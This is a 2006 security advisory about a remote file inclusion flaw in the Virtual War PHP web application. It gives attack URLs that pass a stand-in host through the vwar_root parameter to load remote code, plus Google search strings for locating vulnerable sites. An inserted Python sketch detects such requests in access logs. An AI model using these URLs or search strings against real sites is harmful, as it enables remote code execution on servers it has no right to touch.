Virtual War File Inclusion

2006-04-09T00:00:00
ID SECURITYVULNS:DOC:12108
Type securityvulns
Reporter Securityvulns
Modified 2006-04-09T00:00:00

Description

Virtual War File Inclusion

Site: http://www.vwar.de/
Demo: http://www.vwar.de/demo/


File Inclusion

// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");

File inclusion through the vwar_root parameter

Affected files:

war.php, stats.php, news.php, joinus.php, challenge.php, calendar.php, member.php, popup.php

and

all files in the admin folder


Examples:

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2) (PHP-Nuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite
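
A detection sketch for the request pattern shown above, added here as an example and not part of the original advisory: it scans access-log lines for a vwar_root query parameter whose value is anything other than a local relative path. The log lines are constructed samples in Combined Log Format, and the names scan, LOG_RE and REMOTE_RE are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Combined Log Format: client, identd, user, [time], "METHOD target HTTP/x.y", status
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)
# A value that starts with a scheme (http:, ftp:, php:, ...), "//" or a UNC
# prefix names something other than the local "./" style path the code expects.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)


def scan(lines):
    """Return (client, path, decoded_value, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes names and values once, as the server would,
        # so http%3A%2F%2F... is compared in its decoded form.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == "vwar_root" and REMOTE_RE.match(value):
                findings.append((client, path, value, int(status)))
    return findings


# Constructed sample log lines (documentation IP ranges, paths from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2006:10:00:01 +0000] '
    '"GET /path/admin/admin.php?vwar_root=http://evilsite HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Apr/2006:10:00:05 +0000] '
    '"GET /path/modules/vwar/admin/admin.php?vwar_root=http%3A%2F%2Fevilsite HTTP/1.1" 404 210',
    '198.51.100.7 - - [09/Apr/2006:10:01:00 +0000] '
    '"GET /path/war.php?vwar_root=./ HTTP/1.1" 200 4096',
    '198.51.100.7 - - [09/Apr/2006:10:01:30 +0000] '
    '"GET /path/news.php?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, path, value, status in scan(SAMPLE_LOG):
        print(f"{client} {path} vwar_root={value!r} status={status}")
```

The status code is reported for triage only; a 200 response does not by itself show that the remote file was included.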


Credit: Liz0ziM
E-mail: liz0@bsdmail.com
Site: www.biyo.tk www.biyosecurity.be


Google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"


Source: http://www.blogcu.com/Liz0ziM/431925/ http://liz0zim.no-ip.org/vwar.txt